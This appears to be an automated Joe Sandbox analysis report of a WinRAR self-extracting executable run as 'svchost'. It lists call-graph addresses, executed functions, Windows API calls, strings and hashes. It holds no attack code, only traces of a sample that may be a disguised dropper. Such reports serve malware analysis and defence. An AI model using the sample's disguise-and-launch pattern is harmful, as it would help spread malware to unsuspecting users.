23703->23779 23705 84fcea 23705->23647 23707 854636 __cftof 38 API calls 23706->23707 23708 85c9a8 MultiByteToWideChar 23707->23708 23710 85c9e6 23708->23710 23711 85ca7e 23708->23711 23713 858e06 __vsnwprintf_l 21 API calls 23710->23713 23717 85ca07 __cftof __vsnwprintf_l 23710->23717 23712 84fbbc CatchGuardHandler 5 API calls 23711->23712 23714 85b92e 23712->23714 23713->23717 23720 85ab78 23714->23720 23715 85ca78 23725 85abc3 20 API calls _free 23715->23725 23717->23715 23718 85ca4c MultiByteToWideChar 23717->23718 23718->23715 23719 85ca68 GetStringTypeW 23718->23719 23719->23715 23721 854636 __cftof 38 API calls 23720->23721 23722 85ab8b 23721->23722 23726 85a95b 23722->23726 23725->23711 23727 85a976 __vsnwprintf_l 23726->23727 23728 85a99c MultiByteToWideChar 23727->23728 23729 85a9c6 23728->23729 23730 85ab50 23728->23730 23734 858e06 __vsnwprintf_l 21 API calls 23729->23734 23736 85a9e7 __vsnwprintf_l 23729->23736 23731 84fbbc CatchGuardHandler 5 API calls 23730->23731 23732 85ab63 23731->23732 23732->23698 23733 85aa30 MultiByteToWideChar 23735 85aa49 23733->23735 23748 85aa9c 23733->23748 23734->23736 23753 85af6c 23735->23753 23736->23733 23736->23748 23740 85aa73 23743 85af6c __vsnwprintf_l 11 API calls 23740->23743 23740->23748 23741 85aaab 23742 858e06 __vsnwprintf_l 21 API calls 23741->23742 23745 85aacc __vsnwprintf_l 23741->23745 23742->23745 23743->23748 23744 85ab41 23761 85abc3 20 API calls _free 23744->23761 23745->23744 23746 85af6c __vsnwprintf_l 11 API calls 23745->23746 23749 85ab20 23746->23749 23762 85abc3 20 API calls _free 23748->23762 23749->23744 23750 85ab2f WideCharToMultiByte 23749->23750 23750->23744 23751 85ab6f 23750->23751 23763 85abc3 20 API calls _free 23751->23763 23764 85ac98 23753->23764 23757 85af9c 23759 84fbbc CatchGuardHandler 5 API calls 23757->23759 23758 85afdc LCMapStringW 23758->23757 23760 85aa60 23759->23760 23760->23740 23760->23741 23760->23748 23761->23748 23762->23730 23763->23748 23768 85acc8 23764->23768 23769 85acc4 23764->23769 23765 85ace8 23767 85acf4 GetProcAddress 23765->23767 23765->23768 23770 85ad04 _abort 23767->23770 23768->23757 23771 85aff4 10 API calls 3 library calls 23768->23771 23769->23765 23769->23768 23772 85ad34 23769->23772 23770->23768 23771->23758 23773 85ad55 LoadLibraryExW 23772->23773 23778 85ad4a 23772->23778 23774 85ad72 GetLastError 23773->23774 23777 85ad8a 23773->23777 23776 85ad7d LoadLibraryExW 23774->23776 23774->23777 23775 85ada1 FreeLibrary 23775->23778 23776->23777 23777->23775 23777->23778 23778->23769 23779->23705 23780->23659 25451 85c030 GetProcessHeap 25452 84a440 GdipCloneImage GdipAlloc 25453 853a40 5 API calls CatchGuardHandler 25504 861f40 CloseHandle 25455 84e455 14 API calls ___delayLoadHelper2@8 24423 85c051 31 API calls CatchGuardHandler 24457 84cd58 24458 84ce22 24457->24458 24462 84cd7b 24457->24462 24473 84c793 _wcslen _wcsrchr 24458->24473 24485 84d78f 24458->24485 24461 84d40a 24462->24458 24464 841fbb CompareStringW 24462->24464 24464->24462 24465 84ca67 SetWindowTextW 24465->24473 24470 84c855 SetFileAttributesW 24471 84c90f GetFileAttributesW 24470->24471 24483 84c86f __cftof _wcslen 24470->24483 24471->24473 24474 84c921 DeleteFileW 24471->24474 24473->24461 24473->24465 24473->24470 24476 84cc31 GetDlgItem SetWindowTextW SendMessageW 24473->24476 24479 84cc71 SendMessageW 24473->24479 24484 841fbb CompareStringW 24473->24484 24509 84b314 24473->24509 24513 84a64d GetCurrentDirectoryW 24473->24513 24515 83a5d1 6 API calls 24473->24515 24516 83a55a FindClose 24473->24516 24517 84b48e 76 API calls 2 library calls 24473->24517 24518 853e3e 24473->24518 24474->24473 24477 84c932 24474->24477 24476->24473 24478 834092 _swprintf 51 API calls 24477->24478 24480 84c952 GetFileAttributesW 24478->24480 24479->24473 24480->24477 24481 84c967 MoveFileW 24480->24481 24481->24473 24482 84c97f MoveFileExW 24481->24482 24482->24473 24483->24471 24483->24473 24514 83b991 51 API calls 2 library calls 24483->24514 24484->24473 24487 84d799 __cftof _wcslen 24485->24487 24486 84d9e7 24486->24473 24487->24486 24488 84d9c0 24487->24488 24489 84d8a5 24487->24489 24534 841fbb CompareStringW 24487->24534 24488->24486 24493 84d9de ShowWindow 24488->24493 24531 83a231 24489->24531 24493->24486 24494 84d8d9 ShellExecuteExW 24494->24486 24500 84d8ec 24494->24500 24496 84d8d1 24496->24494 24497 84d925 24536 84dc3b 6 API calls 24497->24536 24498 84d97b CloseHandle 24499 84d989 24498->24499 24504 84d994 24498->24504 24537 841fbb CompareStringW 24499->24537 24500->24497 24500->24498 24501 84d91b ShowWindow 24500->24501 24501->24497 24504->24488 24505 84d93d 24505->24498 24506 84d950 GetExitCodeProcess 24505->24506 24506->24498 24507 84d963 24506->24507 24507->24498 24510 84b31e 24509->24510 24511 84b3f0 ExpandEnvironmentStringsW 24510->24511 24512 84b40d 24510->24512 24511->24512 24512->24473 24513->24473 24514->24483 24515->24473 24516->24473 24517->24473 24519 858e54 24518->24519 24520 858e61 24519->24520 24521 858e6c 24519->24521 24522 858e06 __vsnwprintf_l 21 API calls 24520->24522 24523 858e74 24521->24523 24529 858e7d _abort 24521->24529 24528 858e69 24522->24528 24524 858dcc _free 20 API calls 24523->24524 24524->24528 24525 858ea7 HeapReAlloc 24525->24528 24525->24529 24526 858e82 24546 8591a8 20 API calls _abort 24526->24546 24528->24473 24529->24525 24529->24526 24547 857a5e 7 API calls 2 library calls 24529->24547 24538 83a243 24531->24538 24534->24489 24535 83b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24535->24496 24536->24505 24537->24504 24539 84ec50 24538->24539 24540 83a250 GetFileAttributesW 24539->24540 24541 83a261 24540->24541 24542 83a23a 24540->24542 24543 83bb03 GetCurrentDirectoryW 24541->24543 24542->24494 24542->24535 24544 83a275 24543->24544 24544->24542 24545 83a279 GetFileAttributesW 24544->24545 24545->24542 24546->24528 24547->24529 25507 857f6e 52 API calls 2 library calls 25457 858268 55 API calls _free 25458 84c793 107 API calls 4 library calls 25508 831f72 128 API calls __EH_prolog 25459 84a070 10 API calls 25461 84b270 99 API calls 25462 831075 84 API calls 25394 839a74 25397 839a7e 25394->25397 25395 839b9d SetFilePointer 25396 839bb6 GetLastError 25395->25396 25400 839ab1 25395->25400 25396->25400 25397->25395 25398 83981a 79 API calls 25397->25398 25399 839b79 25397->25399 25397->25400 25398->25399 25399->25395 25402 839f7a 25403 839f88 25402->25403 25404 839f8f 25402->25404 25405 839f9c GetStdHandle 25404->25405 25409 839fab 25404->25409 25405->25409 25406 83a003 WriteFile 25406->25409 25407 839fd4 WriteFile 25408 839fcf 25407->25408 25407->25409 25408->25407 25408->25409 25409->25403 25409->25406 25409->25407 25409->25408 25411 83a095 25409->25411 25413 836baa 78 API calls 25409->25413 25414 836e98 77 API calls 25411->25414 25413->25409 25414->25403

                                                            Executed Functions

                                                            Function 0084DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00840863: GetModuleHandleW.KERNEL32(kernel32), ref: 0084087C
                                                              • Part of subcall function 00840863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0084088E
                                                              • Part of subcall function 00840863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008408BF
                                                              • Part of subcall function 0084A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0084A655
                                                              • Part of subcall function 0084AC16: OleInitialize.OLE32(00000000), ref: 0084AC2F
                                                              • Part of subcall function 0084AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0084AC66
                                                              • Part of subcall function 0084AC16: SHGetMalloc.SHELL32(00878438), ref: 0084AC70
                                                            • GetCommandLineW.KERNEL32 ref: 0084DF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0084DF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0084DF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0084DFCE
                                                              • Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0084DBF4
                                                              • Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084DC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 0084DFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0088EC90,00000800), ref: 0084DFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0088EC90), ref: 0084DFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 0084E009
                                                            • _swprintf.LIBCMT ref: 0084E048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0084E05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0084E061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0084E078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0084E0C9
                                                            • Sleep.KERNEL32(?), ref: 0084E0F7
                                                            • DeleteObject.GDI32 ref: 0084E130
                                                            • DeleteObject.GDI32(?), ref: 0084E140
                                                            • CloseHandle.KERNEL32 ref: 0084E183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-277078469
                                                            • Opcode ID: 5c142dcfd67535695e62edf26bb499c02d20d19c829813e79bb387861a4a170a
                                                            • Instruction ID: 7eaab640536e5648fcb6f2c391d0498b2de8578f365ed44814c28271fe0bc1e3
                                                            • Opcode Fuzzy Hash: 5c142dcfd67535695e62edf26bb499c02d20d19c829813e79bb387861a4a170a
                                                            • Instruction Fuzzy Hash: 9D61F571944349AFD320ABB8EC4DF2B37ADFB45741F04042AF949D2292DBB8D948C762
                                                            Function 0084A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 84a6c2-84a6df FindResourceW 813 84a6e5-84a6f6 SizeofResource 812->813 814 84a7db 812->814 813->814 815 84a6fc-84a70b LoadResource 813->815 816 84a7dd-84a7e1 814->816 815->814 817 84a711-84a71c LockResource 815->817 817->814 818 84a722-84a737 GlobalAlloc 817->818 819 84a7d3-84a7d9 818->819 820 84a73d-84a746 GlobalLock 818->820 819->816 821 84a7cc-84a7cd GlobalFree 820->821 822 84a74c-84a76a call 850320 CreateStreamOnHGlobal 820->822 821->819 825 84a7c5-84a7c6 GlobalUnlock 822->825 826 84a76c-84a78e call 84a626 822->826 825->821 826->825 831 84a790-84a798 826->831 832 84a7b3-84a7c1 831->832 833 84a79a-84a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 84a7b0 833->834 834->832
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0084B73D,00000066), ref: 0084A6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A703
                                                            • LockResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0084B73D,00000066), ref: 0084A72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0084A73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0084A762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0084A7C6
                                                              • Part of subcall function 0084A626: GdipAlloc.GDIPLUS(00000010), ref: 0084A62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084A7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 0084A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 5761299fdee8f27319ed44ac0347e5ace421822fd2969c46b46565e97a48a9b5
                                                            • Instruction ID: 1f68cba2f11de03e5ac723f0be5acccbc7b480de34c54f7f16ca5227d69ac1d7
                                                            • Opcode Fuzzy Hash: 5761299fdee8f27319ed44ac0347e5ace421822fd2969c46b46565e97a48a9b5
                                                            • Instruction Fuzzy Hash: 0031C27560070AAFD7249F21EC89D2B7BB9FF85760B050519F845D6620EB71DC84CAA2
                                                            Function 0083A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1025 83a69b-83a6bf call 84ec50 1028 83a6c1-83a6ce FindFirstFileW 1025->1028 1029 83a727-83a730 FindNextFileW 1025->1029 1030 83a742-83a7ff call 840602 call 83c310 call 8415da * 3 1028->1030 1032 83a6d0-83a6e2 call 83bb03 1028->1032 1029->1030 1031 83a732-83a740 GetLastError 1029->1031 1037 83a804-83a811 1030->1037 1033 83a719-83a722 1031->1033 1039 83a6e4-83a6fc FindFirstFileW 1032->1039 1040 83a6fe-83a707 GetLastError 1032->1040 1033->1037 1039->1030 1039->1040 1042 83a717 1040->1042 1043 83a709-83a70c 1040->1043 1042->1033 1043->1042 1045 83a70e-83a711 1043->1045 1045->1042 1048 83a713-83a715 1045->1048 1048->1033
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6C4
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A728
                                                            • GetLastError.KERNEL32(?,?,?,?,0083A592,000000FF,?,?), ref: 0083A734
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: ba01d68b38fd85ea60b4f5f59bc2ec3f07df5cffbf6fbc684e9b90a1a1f0fecc
                                                            • Instruction ID: 3806cca42476068adc119e362997a66ffe937f6a88edc97a985079325054496f
                                                            • Opcode Fuzzy Hash: ba01d68b38fd85ea60b4f5f59bc2ec3f07df5cffbf6fbc684e9b90a1a1f0fecc
                                                            • Instruction Fuzzy Hash: 53418272500519ABCB29DF68CCC8AE9B7B8FB89350F104596E59DE3200D7346E94CF91
                                                            Function 00857DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002,00000000), ref: 00857E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002,00000000), ref: 00857E16
                                                            • ExitProcess.KERNEL32 ref: 00857E28
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: f1fc89a05483665379ce227a53f4fe502c732c1a78ad685602d0e694475bcea2
                                                            • Instruction ID: 9552f6b6868c98e90d6b2b78b77e06fcf36390c03b1c0d9b9aa544f7c9b1ce1f
                                                            • Opcode Fuzzy Hash: f1fc89a05483665379ce227a53f4fe502c732c1a78ad685602d0e694475bcea2
                                                            • Instruction Fuzzy Hash: ABE04631000648ABCF016F24ED0AA4A3F6AFF10782F018454FC09DA132CB76DE5ACA91
                                                            Function 0083848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: af144b45deb810d44557a57fa47be714b3ae73873a7e433bd54d899d900c7dc8
                                                            • Instruction ID: 29aa1d74bce5970c06cc780aac013cd23f4f02756e0014b3b44adb8a0edc8297
                                                            • Opcode Fuzzy Hash: af144b45deb810d44557a57fa47be714b3ae73873a7e433bd54d899d900c7dc8
                                                            • Instruction Fuzzy Hash: 0C82D570904345EEDF15DB64C895BFABBA9FF85300F0841B9F849DB242DB615A88CBE1
                                                            Function 0084B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084B7E5
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084B8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 0084B902
                                                            • TranslateMessage.USER32(?), ref: 0084B910
                                                            • DispatchMessageW.USER32(?), ref: 0084B91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0084B93D
                                                            • EndDialog.USER32(?,00000001), ref: 0084B960
                                                            • GetDlgItem.USER32(?,00000068), ref: 0084B983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084B99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084B9B1
                                                              • Part of subcall function 0084D453: _wcslen.LIBCMT ref: 0084D47D
                                                            • SetFocus.USER32(00000000), ref: 0084B9B8
                                                            • _swprintf.LIBCMT ref: 0084BA24
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 0084D4D4: GetDlgItem.USER32(00000068,0088FCB8), ref: 0084D4E8
                                                              • Part of subcall function 0084D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0084AF07,00000001,?,?,0084B7B9,0086506C,0088FCB8,0088FCB8,00001000,00000000,00000000), ref: 0084D510
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084D51B
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084D529
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D53F
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084D559
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D59D
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084D5AB
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D5BA
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D5E1
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008643F4), ref: 0084D5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0084BA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0084BA90
                                                            • GetTickCount.KERNEL32 ref: 0084BAAE
                                                            • _swprintf.LIBCMT ref: 0084BAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0084BAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0084BB43
                                                            • _swprintf.LIBCMT ref: 0084BB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0084BBD0
                                                            • GetCommandLineW.KERNEL32 ref: 0084BBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0084BC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0084BC6F
                                                            • Sleep.KERNEL32(00000064), ref: 0084BCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0084BCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0084BCEB
                                                            • _swprintf.LIBCMT ref: 0084BD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084BD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,008635F4), ref: 0084BD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 0084BD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0084BDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0084BDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084BE68
                                                            • _wcslen.LIBCMT ref: 0084BEBE
                                                            • _swprintf.LIBCMT ref: 0084BEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0084BF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0084BF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 0084BF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0084BF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 0084BF85
                                                            • SetWindowTextW.USER32(00000000,0087A472), ref: 0084BFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0084C007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084C01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0084C0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0084C197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0084C1D9
                                                              • Part of subcall function 0084C73F: __EH_prolog.LIBCMT ref: 0084C744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084C1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 581453772-1670982708
                                                            • Opcode ID: b6b5e9f0394f21b04596bf3600c98169db2b14b51b31f524f2f42e759e8c3b5a
                                                            • Instruction ID: d123f63a8ab51c489d8eee7ace495df6e3a66dfab03f735ea0ecf55f6519a0a5
                                                            • Opcode Fuzzy Hash: b6b5e9f0394f21b04596bf3600c98169db2b14b51b31f524f2f42e759e8c3b5a
                                                            • Instruction Fuzzy Hash: 6B42E37094425CBAEB21ABB89C4EFBE7B6CFB11700F040055F644E61E2DBB49E44CB66
                                                            Function 00840863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
